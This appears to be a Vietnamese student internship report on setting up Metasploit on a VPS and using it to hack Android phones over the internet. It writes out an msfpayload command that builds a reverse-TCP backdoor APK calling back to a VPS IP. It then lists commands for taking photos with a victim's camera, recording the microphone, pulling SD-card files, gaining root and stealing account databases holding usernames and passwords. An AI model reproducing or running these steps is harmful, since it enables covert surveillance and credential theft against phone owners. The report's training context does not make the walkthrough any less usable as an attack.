Sinh viên thực tập : Tô Thị Hường

Ca thực tập : 7h=>10h thứ 2,4,6

II. Thực hiện trên môi trường internet

1.Cài mã độc trên VPS

1.1 Cài đặt Metasploit lên VPS

a. Giới thiệu

Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra,

tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng

đối tượng Perl, với những components được viết bằng C, assembler, và Python.

Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.

b. Cài đặt

Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community. Ta

chọn phiên bản Community miễn phí và dùng cho nghiên cứu.

Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần

mềm khác.

Chọn folder cài đặt:

Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:

Chọn server và ngày hết hạn, để mặc định:

Quá trình cài đặt của Metasploit:

Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương trình:

Sau khi Finish trình duyệt web mở lên và đi tới giao diện

Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login vào

Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn

Create Account:

Trình duyệt chuyển đến trang nhập key để active chương trình, key này được gửi

miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:

2. Từ VPS điều khiển thiết bị qua internet

Các bước thực hiện

Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android

như trên mang Lan với địa chỉ IP là địa chỉ của VPS

Chúng ta vẫn sử dụng lệnh “Msfpayload

android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R >

/root/Desktop/files.apk” ở đây địa chỉ VPS là 14.0.21.132

Khởi động Metasploit Console trên VPS

Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây

chỉ khác là sử dụng chính IP của VPS

Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị hack

Để xem thông tin về máy, nhập lệnh SysInfo

Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera

xem ở danh sách camera ở phần trước.

Ghi âm: Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về

máy

Lấy file từ sd card

Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư

mục

Dùng lệnh cd /sdcard/Download để vào thư mục

Để tải về máy, ta nhập lệnh

Download madoc.apk

Một số lệnh khác :

Để upload gõ lệnh: #upload. Và file này sẽ được tải về thư mục root của

máy Kali

Gõ shell để vào lệnh kiểm tra xem có root chưa gõ

su

whoami

Nếu báo unknown id is 0 tức là đã root

ls -l danh mục file và các quyền

cd để chuyển hướng thư mục

Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền

/DATA

/DATA/APP

/DATA/SYSTEM

/DATA/SYSTEM/accounts.db

/DATA/SYSTEM/SYNC/accounts.xml

/SYSTEM/APP/

Để xem danh sách và down load các file hay thay đổi các file trong ROM

đầu tiên phải gõ lệnh SU để có toàn quyền truy cập

Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename

Ví dụ chmod -R 777 /data

^C để quay lại

Sử dụng SQLite để mở file db